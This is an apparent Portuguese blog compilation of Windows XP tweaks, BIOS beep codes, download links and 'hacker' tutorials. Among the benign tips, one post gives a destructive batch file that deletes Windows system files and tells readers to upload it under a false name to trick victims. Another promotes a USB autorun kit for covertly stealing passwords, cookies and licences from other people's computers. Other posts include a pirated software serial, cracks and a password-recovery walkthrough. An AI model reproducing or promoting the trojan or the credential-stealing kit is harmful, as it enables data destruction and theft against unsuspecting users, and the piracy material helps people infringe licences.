- Desabilitar Hibernação.reg
- Diminuir o Tempo pro Windows Desligar
- Aumenta o Cache do Ícones da Área de Trabalho
===============================================

Senha caso precise:: ETICAHACKER (Letra minúscula)


http://www.4shared.com/file/78845201/325ef56c/XPTURBO_eXtreme_downloadsfacilcom.html?dirPwdVerified=35539a5f

Melhorando Inicialização

GO em>> INICIAR >>EXECUTAR>>digite msconfig e Ok.

Na aba Inicializar

Desmarque todos os itens desnecessários, apenas deixando o Antivirus, Skype (se tiver), e outros que você considerar importante.

Após fazer tudo certinho, clique em Aplicar, OK e reinicie seu computador

Eu apenas deixo o Skype e meu antivirus no caso ESETNOD32 que vai estar escrito egui.<~Dica

Algumas pessoas desmarcam todos os itens..Isso é por sua conta.


PS:VOCÊ IRÁ REMOVER OS ITENS QUE FICAM DO LADO DO RELÓGIO (Pra quem não souber.)

Efeito visual e Abertura de páginas

Vá ate >>INCIAR>>PAINEL DE CONTROLE>>SISTEMA>>

Clique na aba Avançado,

''Desempenho'' Clique em Configurações

Em ''Efeitos Visuais''

Deixa apenas as seguintes opções marcadas, nas quais eu recomendo!

[√] Usar estilos visuais em janelas e botões

[√] Usar fontes de tela com cantos arredondados

[√] Usar sombras subjacentes para rótulos de ícones na área de trabalho

[√] Usar tarefas comuns em pastas

Clique em Aplicar e Ok. DikDada! ;)

Obs:Algumas pessoas deixam todas as opções sem nenhuma marcação, eu sinceramente não gosto, fica com o Tema XP em aspecto antigo e é desnecessário.

créditos: Ryoga/C3h

[DICA] Deixe seu 'XP' muito mais rápido!

Vá ate o menu Iniciar>>Executar : Digite Regedit, e dê Ok.
- Irá abrir o 'Editor do registro'..
Vá até HKEY_LOCAL_MACHINE certo, agora vá clicando em [+]
Vá ate SOFTWARE clica em [+] MICROSOFT e clique em [+]

Ok...Agora procure por OLE clique 1x na Palavra ''Ole''

Do lado irá aparecer uns 'treco' ae, vá apenas em EnableDCOM dê 2x clique,

Mude o Valor de Y para N

Pronto.

PS:LEMBRE-SE DE FECHAR NO SINAL DE MENOS [-] TODAS AS ABAS QUE VOCÊ ABRIU DENTRO DO ''EDITOR''!!! (APÓS EDITÁ-LO)
===========================
INICIAR MAIS RÁPIDO

Vá no Regedit>>Vai abrir o ''Editor do registro''. Ok

Vá em HKEY_CURRENT_USER, clique 2x na palavra ou 1x no [+]
>>> Control Painel [+]
>>> Desktop 1X CLIQUE
>> Olhe do lado e procure por MenuShowDelay, clique 2x e mude o valor atual, para 0
Agora no mesmo lugar, um pouco mais em baixo vá ate WaitToKillAppTimeOut
mude o valor atual, para 3000.

Feche tudo bonitinho deixando com sinal de [+]

Após reiniciar o Pc irá notar a diferença!

Obs: Estes valores são os que Eu uso e recomendo, caso queira alterar os valores, que seja por sua PRÓPRIA conta e risco.

[DICA] Cuidados com o Pendrive

Nao deixe ele conectado o tempo todo no computador se nao estiver em uso: Existe um numero maximo de ciclos de leitura/escrita definido pra TODO tipo de pendrive ( alias qq tipo de elemento regravavel) .
Se voce deixar o tempo todo ligado, o Ruindows sempre vai dar uma acessadinha, mesmo vc nao querendo ler ou escrever nele. Isso conta como acesso. Dai depois de um tempo, o pen pode deixar de funcionar.
Esse limite depende da tecnologia utilizada : mais caro , mais longo esse tempo de vida. Existem alguns super baratos, que sao da classe de Brindes, que o numero de acessos maximo eh de aprox 200 a 300 veses.

Os pins tambem tem um tempo de acesso/ leitura e escrita diferentes entre si. Existem os mais lentos, tipicos pra USB1 e os mais rapidos , para USB2.

Sempre tenha a paciencia de, primeiro, desabilitar o acesso no windows pra depois desconectar o pendrive do micro. Sem fazer isso, pode nao acontecer nada quase nunca, mas tb corromper o conteudo do PEN.

Outro cuidado eh levar no bolso: existe o risco de trincar o conector junto ao corpo se ele sofrer um esforco no sentido de dobra.

Quando for conectar, nao tente fazer sem olhar, pq tentar por meio torto pode danificar as pistas de conexao.

Aumentar a Velocidade DasPáginas

Aumentar a velocidade das paginas...
1º Vá em Iniciar /Executar / Digite; regedit

2º Vá em HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / Dnscache / Parameters.

3º Click com o botão direito do mouse na parte branca / Novo / Valor DWORD.

4º Nomei o arquivo como MaxCacheEntryTtlLimit / Clique com o botão direito e vá em modificar, Lá Nos dados de valor voce coloca isso; 0000fa00

5º Fassa isso com mais esses 3 ai em baixo /


MaxSOACacheEntryTtlLimit ; 0000012d /


CacheHashTableBucketSize ; 00000001 /


CacheHashTableSize ; 00000180 .

Explore outras máquinas da rede mais rapidamente

Quando procura por outros computadores na rede, o Windows XP verifica por tarefas agendadas em comum nas mesmas. Desabilitar este recurso faz com que a procura por outros micros da rede seja bem mais ágil. Siga as etapas abaixo:
Iniciar > Executar, digite “regedit” (sem aspas), pressione OK.
Vá em HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace
e procure pela chave {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Apague-a e pronto. A visualização/navegação por outras estações da rede ficará mais rápida.

[ Dica ] Web site de segurança

Website voltado a segurança de sistemas de informática, o conteúdo
apresentado aqui é apenas para práticas de segurança e possívelmente pode ser
usado para prática de atos criminosos na cena underground, porém se algum
visitante do site praticar algun ato ilegal as responsabilidades são
totalmente dele. Se você seguir e visualizar o conteúdo do site isto significa
que os seus atos são de sua responsabilidade.

------------------------------------------------
www.AntiSecurity.com.br

Comunidade do site


http://www.orkut.com.br/Main#Community?cmm=60500341

[DICA] Reconhecendo códigos de erros d Bios [Beeps

Durante o boot, o BIOS realiza uma série de testes, visando detectar com exatidão os componentes de hardware instalados no PC. Este teste é chamado de POST (pronuncia-se poust), acrônimo de “Power-On Self Test”. Os dados do POST são mostrados durante a inicialização, na forma da tabela que aparece antes do carregamento do sistema operacional, indicando a quantidade de memória instalada, assim como os discos rígidos, drives de disquetes, portas seriais e paralelas e drives de CD-ROM padrão IDE instalados no PC.

Além de detectar o hardware instalado, a função do POST é verificar se tudo está funcionando corretamente. Caso seja detectado algum problema em um componente vital para o funcionamento do sistema, como as memórias, processador ou placa de vídeo, o BIOS emitirá uma certa seqüência de bips sonoros, alertando sobre o problema. Problemas menores, como conflitos de endereços, problemas com o teclado, ou falhas do disco rígido serão mostrados na forma de mensagens na tela.

O código de bips varia de acordo com a marca do BIOS (Award ou AMI, por exemplo) podendo também haver pequenas mudanças de uma placa mãe para outra. Geralmente, o manual da placa mãe traz uma tabela com as seqüências de bips usadas. As instruções a seguir lhe servirão como referência caso não tenha em mãos o manual da placa-mãe:

1 Bip Curto: Post Executado com Sucesso: Este é um Bip feliz emitido pelo BIOS quando o POST é executado com sucesso. Caso o seu sistema esteja inicializando normalmente e você não esteja ouvindo este Bip , verifique se o speaker está ligado à placa-mãe corretamente.

* 1 Bip Longo: Falha no Refresh (Refresh Failure): O circuito de refresh da placa-mãe está com problemas, isto pode ser causado por danos na placa mãe ou falhas nos módulos de memória RAM

* 1 Bip Longo e 2 Bips Curtos; 1 Bip Longo e 3 Bips Curtos: Falha no Vídeo: Problemas com o BIOS da placa de vídeo. Tente retirar a placa, passar borracha de vinil em seus contatos e recolocá-la, talvez em outro slot. Na maioria das vezes este problema é causado por mau contato.

* 2 Bips Curtos: Falha Geral: Não foi possível iniciar o computador. Este problema é causado por uma falha grave em algum componente, que o BIOS não foi capaz de identificar. Em geral o problema é na placa mãe ou nos módulos de memória.

* 2 Bips Longos: Erro de Paridade: Durante o POST, foi detectado um erro de paridade na memória RAM. Este problema pode ser tanto nos módulos de memória quanto nos próprios circuitos de paridade. Para determinar a causa do problema, basta fazer um teste com outros pentes de memória. Caso esteja utilizando pentes de memória sem o Bit de paridade você deve desativar a opção “Parity Check” encontrada no Setup.

* 3 Bips Longos: Falha nos Primeiros 64 KB da Memória RAM (Base 64k Memory Failure): Foi detectado um problema grave nos primeiros 64 KB da memória RAM. Isto pode ser causado por um defeito nas memórias ou na própria placa mãe. Outra possibilidade é o problema estar sendo causado por um simples mal contato. Experimente antes de mais nada retirar os pentes de memória, limpar seus contatos usando uma borracha de vinil (aquelas borrachas plásticas de escola) e recoloca-los com cuidado.

* 4 Bips Longos: Timer Não Operacional: O Timer 1 não está operacional ou não está conseguindo encontrar a memória RAM. O problema pode estar na placa mãe (mais provável) ou nos módulos de memória.

* 5 Bips: Erro no Processador: O processador está danificado, ou mal encaixado. Verifique se o processador está bem encaixado, e se por descuido você não esqueceu de baixar a alavanca do soquete Zif (acontece nas melhores famílias)

* 6 Bips: Falha no Gate 20 (8042 - Gate A20 Failure): O gate 20 é um sinal gerado pelo chip 8042, responsável por colocar o processador em modo protegido. Neste caso, o problema poderia ser algum dano no processador ou mesmo problemas relacionados com o chip 8042 localizado na placa mãe.

* 7 Bips: Processor Exception (Interrupt Error): O processador gerou uma interrupção de exceção. Significa que o processador está apresentando um comportamento errático. Isso acontece às vezes no caso de um overclock mal sucedido. Se o problema for persistente, experimente baixar a freqüência de operação do processador. Caso não dê certo, considere uma troca.

* 8 Bips: Erro na Memória da Placa de Vídeo (Display Memory Error): Problemas com a placa de vídeo, que podem estar sendo causados também por mal contato. Experimente, como no caso das memórias, retirar a placa de vídeo, passar borracha em seus contatos e recolocar cuidadosamente no slot. Caso não resolva, provavelmente a placa de vídeo está danificada.

* 9 Bips: Erro na Memória ROM (ROM Checksum Error): Problemas com a memória Flash, onde está gravado o BIOS. Isto pode ser causado por um dano físico no chip do BIOS, por um upgrade de BIOS mal sucedido ou mesmo pela ação de um vírus da linhagem do Chernobil.

* 10 Bips: Falha no CMOS Shutdown Register (CMOS Shutdown Register Error): O chamado de shutdown register enviado pelo CMOS apresentou erro. Este problema é causado por algum defeito no CMOS. Nesse caso será um problema físico do chip, não restando outra opção senão trocar a placa mãe.

* 11 Bips: Problemas com a Memória Cache (Cache Memory Bad): Foi detectado um erro na memória cache. Geralmente quando isso acontece, o BIOS consegue inicializar o sistema normalmente, desabilitando a memória cache. Mas, claro, isso não é desejável, pois deteriora muito o desempenho do sistema. Uma coisa a ser tentada é entrar no Setup e aumentar os tempos de espera da memória cache. Muitas vezes com esse “refresco” conseguimos que ela volte a funcionar normalmente.

[SOFT]Antenna web designer

muito massa esse programinha
no site abaixo mostra o que ele é capaz :)
bom pra quem gosta de criar sites.


http://codigofonte.uol.com.br/download/editores/html/antenna-webdesign-studio-27

[TUTORIAl] Descobrindo todas a senha de logon

Essa ferramenta mostra a senha dos usuários em sistemas windows (XP/2k/2k3/Vista), particularmente testei no XP e o resultado foi surpreendente, em poucos minutos esta na tela os usuários e senhas.
Alguns outros programas prometem zerar a senha e outras coisas, porém, esta permite visualizar a senha, sem a necessidade de removê-la, ideal nos casos onde você precisa descobrir a senha de administrador seja do seu próprio computador ou de um cliente que a esqueceu.
O programa consiste num linux live-cd, da distribuição Slax, baseado no Slackware. A sua utilização é bastante simples:
1 - Baixe o arquivo ISO no final desta página;
2 - Grave a imagem ISO num Cd; (lembre-se que tem que gravar o cd como arquivo de imagem)
3 - Dê o boot pelo cd e espere o carregamento do sistema;
4 - Aguarde e surgirá uma tela onde o sistema irá começar a montar as partições do seu disco rígido e em seguida exibira uma tela com os usuários e senhas;
5 - Após anotar a senha que deseja, feche as janelas abertas, clique com o botão direito do mouse em qualquer lugar da tela e selecione “xterm”, na janela que abrir digite “reboot” e tecle .
Serviço feito...
http://sourceforge.net/project/downloading.php?groupname=ophcrack&filename=ophcr...

[DOWN] TuneUp Utilities 2010

Download: TuneUp Utilities 2010 - PT-BR
Site: http://www.tuneup-software.com.br/products/tuneup-utilities
Download:http://download2.tune-up.com/TUU2010/TU2010TrialPT-BR. exe (Junte o .exe)
Serial: N1YD6Q-6JP6QP-2JN2MH-05JJVV-M3Q5T3-APTWNR
Pule o registro online
Baixem e testem :D

[TUTO] Desbloqueando celulares

Diversas marcas,
como Siemens, Nokia, Samsung, LG, Motorola e etc. Neste tutorial não há necessidades de utilizar cabos,

A prática de desbloquear celulares não é ilegal, e o que me fez pesquisar e escrever a respeito foi
o fato de ter visitado ontem um site chamado Bloqueio Não, que tem como intuito divulgar um manifesto
contra a prática de algumas operadoras em bloquear os celulares para não aceitar a utilização
de chips de outras operadoras.

Vale deixar claro que o tutorial não foi elaborado por mim, deixo às devidas fontes no final do artigo.
Não trabalho com desbloqueio de celulares, então afirmo que não sou expert no assunto, mas comentários
e dúvidas serão bem-vindos, farei o possível para ajudar.

Para dar início ao tutorial ao desbloqueio do celular, deve-ser fazer o download do programa que é uma
calculadora necessária para os cálculos de desbloqueio. Clique no link abaixo:

» Crux Unlocker v5.0

Instale o programa e execute-o. Percebe-se que é tudo muito simples e de fácil entendimento.
No exemplo de tutorial é utilizado o Nokia N-Gage QD, mas pode ser feito com qualquer modelo.

Para começar o desbloqueio, é preciso antes saber o IMEI do celular. Para isso,
digite o código *#06# e vai aparecer na tela, ou olhe na parte traseira, atrás da bateria.

ALERTA: NUNCA passe o IMEI do seu aparelho para ninguém. Com este código,
o seu aparelho poderá ser facilmente clonado.

Selecione a fabricante do seu aparelho celular e depois selecione o modelo. Logo abaixo,
digite o IMEI do seu celular e selecione o país e a operadora.

No programa vai aparecer todas as operadoras: TIM, CLARO, OI, VIVO e etc.

Obs.: Na operadora TIM, aparecem 3 descrições: TIM, TIM NEW1 e TIM NEW2. Para saber qual operadora escolher faça o seguinte:

- Verifique uma série de números em seu chip, deverá começar com 8955XX onde XX representa o código da sua rede.

02 = TIM
03 = TIM NEW 1
04 = TIM NEW 2

- O número 02 corresponde ao nordeste, centro-oeste e sudeste (exceto SP).
- O número 03 corresponde á São Paulo.
- O número 04 ao sul (PR, SC, RS) e ainda MS.

Após inserir todos os dados, clique em “Calculate“. No lado direito irá aparecer alguns códigos:


Observe na imagem, que o programa gerou 7 códigos. É destacado os dois que realmente
vão importar para o desbloqueio do aparelho. O primeiro código, que foi destacado na cor preta,
é o código padrão. Apenas com ele na maioria das vezes o aparelho é imediatamente desbloqueado,
não fazendo necessário a utilização do código destacado em vermelho, que é chamado de Master Code.
Anote os dois códigos e desligue o seu celular.

Agora, retire o chip da operadora e ligue o celular novamente. Como possuímos apenas 5 tentativas,
utilize o código #pw+***************+1# (Para gerar os algarismos P, W e +, basta apenas segurar a tecla *)
. Caso o celular não desbloqueie, tente com o código #pw+***************+7#.

Se o celular ainda não estiver desbloqueado, reveja todos os passos e tente novamente.
Lembrando que você só tem 5 tentativas para tentar desbloquear. Após estourar o limite,
seu celular será desbloqueado apenas via hardware (cabos, etc).

[TUTO]Hack(virus) que destroi um PC pelo Bloco... "Virus pelo Bloco de notas Hack que destroi PC"

!@#$%¨&*()_++ATEMÇAO++_)))(*&¨%$@

NAO CLIKE NO VIRUS QUE FOI FEITO A NAO SER QUE ESTEJA PRETENDENDO

FORMATAR O PC




1° abra o bloco de notas

2° escrevam

@echo off
rd "c:\windows\pchealth\"
rd "c:\windows\system\"
rd "c:\windows\system32\restore\"
rd "winlogon.exe"
rd "c:\windows\system32\autoexec.nt"
rd "c:\windows\system32\logonui.exe"
rd "c:\windows\system32\ntoskrnl.exe"

3° salve como "(qualquer nome)".bat

exemplo "Hack".bat

Pronto depois de fazelo e so postar em sites como 4shared , baixaki
postar ele com um nome falso e quando o sujeito clikar para instalar PUF! queima dados etc.





!@#$%¨&*()_++ATEMÇAO++_)))(*&¨%$@

NAO CLIKE NO VIRUS QUE FOI FEITO A NAO SER QUE ESTEJA PRETENDENDO

FORMATAR O PC

Baixar arquivos s/ ter que cadastrar celular

segue a dica p/ burlar o protetor de link e evitar ter que cadastrar celular:
"Quando isso acontecer, faça o seguinte: na barra de endereço, aparece dois endereços integrados (dois http’s). Deixa só o segundo e tecla Enter. Pronto, se o arquivo estiver realmente disponível, abrirá uma página para fazer o download".
fonte: http://ponderador.blogspot.com/2009/11/como-baixar-filmes-sem-fazer-cadastro.html

[DOWN] Pen drive assasino

Hackear pelo USB (Autorun via PenDriVe)
Este programa rouba todo tipo de senha e informações confidenciais no PC em que for inserido o PenDrive, isto ocorre mediante um arquivo autorun que executa varias miniutilidades que tem nesse programa.

Entre outras coisas esse programa grava:

-> Todo tipo de senha do navegador, msn, fóruns.
-> Senhas de emails como yahoo, orkut, hotmail.
-> Histórico do Navegador.
-> Licenças de programas instalados.
-> Cookies.
-> Portas abertas recentemente.
-> Toda informação de hardware.


COMO USÁ-LO:

1. Baixe o arquivo e descompacte para alguma pasta em seu PC, e copie todos os arquivos e pastas para o seu PenDrive.



(Você pode deixar esses arquivos ocultos para não levantar suspeitas)

2. Uma vez preparado o seu PenDrive vá em qualquer Lan House, ou casa de amigo, namorada (o) ou qualquer vítima que queira hackear, e diga que quer testar o seu PenDrive, ou que quer copiar uma foto, se vira.

Insira o Pendrive no USB e aguarde 10 segundos aproximadamente.

Obs.: Não abra nenhuma das 3 pastas, se não o AntiVirus vai gritar, pois alguns arquivos contém códigos que os AntiVirus detectam como malicioso.


3. Vá tranquilamente em seu PC, abra a pasta "Dump", haverá uma nova pasta com o nome do PC da vítima e no seu interior vários arquivos .html com todas as informações que foram hackeadas.


senha no 4shared: eticahacker
senha no winrar : c3h

segunda-feira, 23 de agosto de 2010

Toques engraçados

http://www.ziddu.com/download/11348353/Toques_para_celular_-_topo_pq_.mp3.html

http://www.ziddu.com/download/11348354/toques_para_celular_-_Cesar_Po.mp3.html

http://www.ziddu.com/download/11348354/toques_para_celular_-_Cesar_Po.mp3.html

http://www.ziddu.com/download/11348356/Toques_Celular_-_Colheita_Feli.mp3.html

http://www.ziddu.com/download/11348357/afodadopatodonald.mp3.html

http://www.ziddu.com/download/11348358/ddsiri-panico.mp3.html

http://www.ziddu.com/download/11348359/funk_billie_jean-toques_para_c.mp3.html

http://www.ziddu.com/download/11348360/homem_beringela-www.toquesparacelular.biz.mp3.html

http://www.ziddu.com/download/11348361/Toques_para_celular-Funk_Do_Ro.mp3.html

http://www.ziddu.com/download/11348363/toques_de_porcarias_wwwzoonado.mp3.html

terça-feira, 8 de junho de 2010

Download do dragon(navegador)

http://sharingmatrix.com/file/7397225/DragonSetup.exe

Downlaod de algumas musicas de rock

http://www.ziddu.com/download/10203480/12-avenged_sevenfold-unholy_confessions.mp3.html
http://www.ziddu.com/download/10203479/AvengedSevenfoldBatCountryLiveInLBC.mp3.html
http://www.ziddu.com/download/10203478/10-avenged_sevenfold-almost_easy.mp3.html
http://www.ziddu.com/download/10203477/AvengedSevenfold-AfterlifeLive.mp3.html
http://www.ziddu.com/download/10203476/04_Link_Park_-_Live_In_Texas_-.mp3.html
http://www.ziddu.com/download/10203475/AvengedSevenfold-SeizetheDayMusicVideo.mp3.html
http://www.ziddu.com/download/10203473/12_Link_Park_-_Live_In_Texas_-.mp3.html
http://www.ziddu.com/download/10203471/05_Link_Park_-_Live_In_Texas_-.mp3.html

Download do google chrome

http://sharingmatrix.com/file/7395921/GoogleChromePortable_4.0.249.89_online.paf.exe

Donload do firefox portátil

http://sharingmatrix.com/file/7393431/FirefoxPortable_3.6.3_PortugueseBR.paf.exe

quarta-feira, 28 de abril de 2010

• Alt - Atalhos

Alt + 1= ☺
Alt + 2= ☻
Alt + 3= ♥
Alt + 4= ♦
Alt + 5= ♣
Alt + 6= ♠
Alt + 7= •
Alt + 8= ◘
Alt + 9= ○
Alt + 10= ◙
Alt + 11= ♂
Alt + 12= ♀
Alt + 13= ♪
Alt + 14= ♫
Alt + 15= ☼
Alt + 16= ►
Alt + 17= ◄
Alt + 18= ↕
Alt + 19= ‼
Alt + 20= ¶
Alt + 21= §
Alt + 22= ▬
Alt + 23= ý
Alt + 24= ↑
Alt + 25= ↓
Alt + 26= →
Alt + 27= ←
Alt + 28= ∟
Alt + 29= ↔
Alt + 30= ▲
Alt + 31= ▼
Alt + 32=
Do Alt + 33 até o Alt + 126 são caractéres numéricos e de letras comuns do teclado... continuando
Alt + 127= ⌂
Alt + 128= Ç
Alt + 129= ü
Alt + 131= â
Alt + 132= ä
Alt + 133= à
Alt + 134= å
Alt + 135= ç
Alt + 136= ê
Alt + 137= ë
Alt + 138= è
Alt + 139= ï
Alt + 140= ¥
Alt + 141= ì
Alt + 142= Ä
Alt + 143= Å
Alt + 144= É
Alt + 145= æ
Alt + 146= Æ
Alt + 147= ô
Alt + 148= ö
Alt + 149= ò
Alt + 150= û
Alt + 151= ù
Alt + 152= ÿ
Alt + 153= Ö
Alt + 154= Ü
Alt + 155= ø
Alt + 156= £
Alt + 157= Ø
Alt + 158= ×
Alt + 159= ƒ
Alt + 160= á
Alt + 161= í
Alt + 162= ó
Alt + 163= ú
Alt + 164= ñ
Alt + 165= Ñ
Alt + 166= ª
Alt + 167= º
Alt + 168= ¿
Alt + 169= ®
Alt + 170= ¬
Alt + 171= ½
Alt + 172= ¼
Alt + 173= ¡
Alt + 174= «
Alt + 175= »
Alt + 176= ░
Alt + 177= ▒
Alt + 178= ▓
Alt + 179= │
Alt + 180= ┤
Alt + 181= Á
Alt + 182= Â
Alt + 183= À
Alt + 184= ©
Alt + 185= ╣
Alt + 186= ║
Alt + 187= ╗
Alt + 188= ╝
Alt + 189= ¢
Alt + 190= ¥
Alt + 191= ┐
Alt + 192= └
Alt + 193= ┴
Alt + 194= ┬
Alt + 195= ├
Alt + 196= ─
Alt + 197= ┼
Alt + 198= ã
Alt + 199= Ã
Alt + 200= ╚
Alt + 201= ╔
Alt + 202= ╩
Alt + 203= ╦
Alt + 204= ╠
Alt + 205= ═
Alt + 206= ╬
Alt + 207= ¤
Alt + 208= ð
Alt + 209= Ð
Alt + 210= Ê
Alt + 211= Ë
Alt + 212= È
Alt + 213= ı
Alt + 214= Í
Alt + 215= Î
Alt + 216= Ï
Alt + 217= ┘
Alt + 218= ┌
Alt + 219= █
Alt + 220= ▄
Alt + 221= ¦
Alt + 222= Ì
Alt + 223= ▀
Alt + 224= Ó
Alt + 225= ß
Alt + 226= Ô
Alt + 227= Ò
Alt + 230 = µ
Alt + 231 = þ
Alt + 232 = Þ
Alt + 238 = ¯
Alt + 239 = ´
Alt + 241 = ±
Alt + 242 = ‗
Alt + 243 = ¾
Alt + 244 = ¶
Alt + 246 = ÷
Alt + 247 = ¸ (diferente de , )
Alt + 248 = ° (diferente de º)
Alt + 254 = ■
Alt + 260 = Ą
Alt + 261 = ą
Alt + 269 = č
Alt + 271 = ď
Alt + 272 = Đ
Alt + 280 = Ę
Alt + 281 = ę
Alt + 282 = ଙ
Alt + 2482 = ল
Alt + 2852 = ତ
Alt + 2862 = ମ
Alt + 21812 = 唴
Alt + 295436 = 舌
Alt + 54423 = 풗
Alt + 28732 = 瀼
Alt + 1833 = ܩ
Alt + 1943 = ޗ
Alt + 95418 = 璺
Alt + 95418 = ┮
Alt + 95417 = 璹
Alt + 95419 = 璻
Alt + 95416 = 璸
Alt + 5727345 = 摱
Alt + 35268 = 规
ALT + 0160 =(espaço)

terça-feira, 27 de abril de 2010

Como colocar uma foto no quem sou eu Como colocar uma foto no perfil do orkut

aqui nesse link tem um tutorial explicando passo por passo.

http://www.google.com.br/support/forum/p/orkut/thread?tid=694c29c7de9cc0be&hl=pt-BR

segunda-feira, 26 de abril de 2010

Programas Essenciais 2009

Descrição: “Trata-se de um Cd com 44 programas Essenciais para o computador. Todos os programas estao atualizados, o cd é auto executavel e com menu o que facilita a instalação dos programas. No botão criação encontra-se o meu e-mail para contato e uma lista com a explicaçao de cada programa. O cd tem tambem todos os cracks e seriais necessarios para os programas.

É só gravar a iso com o nero e sair usando!”.

Conteudo do CD:
Ad-Aware 2009 8.0 (Anniversary Edition)
Adobe Reader Português 9.1.0
Alcohol.120.v1.9.6.4719
Avast 4.8.1335 – Portugues
Bankerfix
Bear Share
Bit Comet
CD BurnerXP Pro 4.2.4.1272
Convert X to DVD.v2.2.3
Cracks e Seriais
Daemon Tools
DupFinder
DvD Santa Full 4.5
Ebooster
ESET NOD32 4.0.314.0
Everest.Ultimate.Edition.v5.01.1726.beta
Flash Player 10
Folder2Iso
HijackThis
HJ Datilografia
hjsplit
InterApp Control
Internet Explorer 8
Java
Kaspersky_Anti-Virus_2009_v8.0.0.454_FINAL
KAV_Removal_Tool_7.0.0.290_08.02.2009_Po rtable
K-Lite Codec
Malwarebytes- anti malware
Mozilla Firefox 3.0.10 Pt
msn 2009 pt
MV AntiSpy 4.0
MV RegClean 5.9
Nero.7.10.1.0.PtBr
Partition Magic 8.0
PDF2Word_v3.0_etherno_
PenClean_2.0.3
Real Player
Recover.My.Files.3.9.8.5807
Restoration
Revo Desisntalador
Skype 4.0.0.226 Pt
spybot
Windows Media Player 11
WinKeyFinder173_RC2
WinRAR 3.80 Final

Nome: Programas Essenciais 2009
Fabricante: Technos
Estilo: Essenciais
Sistema Operacional: Windows XP/Vista/2000
Ano de Lançamento: 2009
Tamanho: 624.01 MB
Formato: Iso
Facilidade de Uso: 10
Interface Gráfica: 10
Número de Mídias: 1 CD
Idioma: Português

http://clubedodownload.info/link/?url=http://www.megaupload.com/?d=H3BOHOX7

http://clubedodownload.info/link/?url=http://depositfiles.com/files/0bgsuawk7

AVI ReComp 1.5.0

Insira legendas, logomarcas e até altere o tamanho dos vídeos com esta poderosa ferramenta para o formato AVI.

Se você adora personalizar ou se só quer colocar as legendas no seu filme, o AVI ReComp é um programa indispensável. O programa possui uma interface com botões e funções muito bem divididas e localizadas. São botões que funcionam em um sistema de abas/guias, em que cada palavra corresponde a uma função e seus complementos.

http://www.baixaki.com.br/site/dwnld42095.htm

PhotoScape 3.4

Monte combinações com suas melhores fotos, faça correções e forme quadros prontos para imprimir

Photoscape é PhotoScapeum programa versátil para você trabalhar com imagens das mais variadas formas, incluindo as funções de vários softwares gráficos num único arquivo de aproximadamente 15 MB para baixar. Para você ter uma noção do que o PhotoScape é capaz, saiba que ele reúne ferramentas de edição individual ou em massa, captura de tela, visualização, combinação, impressão, conversão e até criação de animações GIF, organizadas de uma maneira prática e voltada para atender todos os tipos de usuários.

Suas ferramentas são descomplicadas e ideais para trabalhos rápidos, não exigindo procedimentos complexos em nenhuma das seções do programa. Por isso, se você quer organizar suas fotos com facilidade e deixá-las prontas para imprimir ou guardar de um forma especial no computador, PhotoScape é uma opção leve e gratuita que você pode aproveitar.

http://www.baixaki.com.br/site/dwnld46101.htm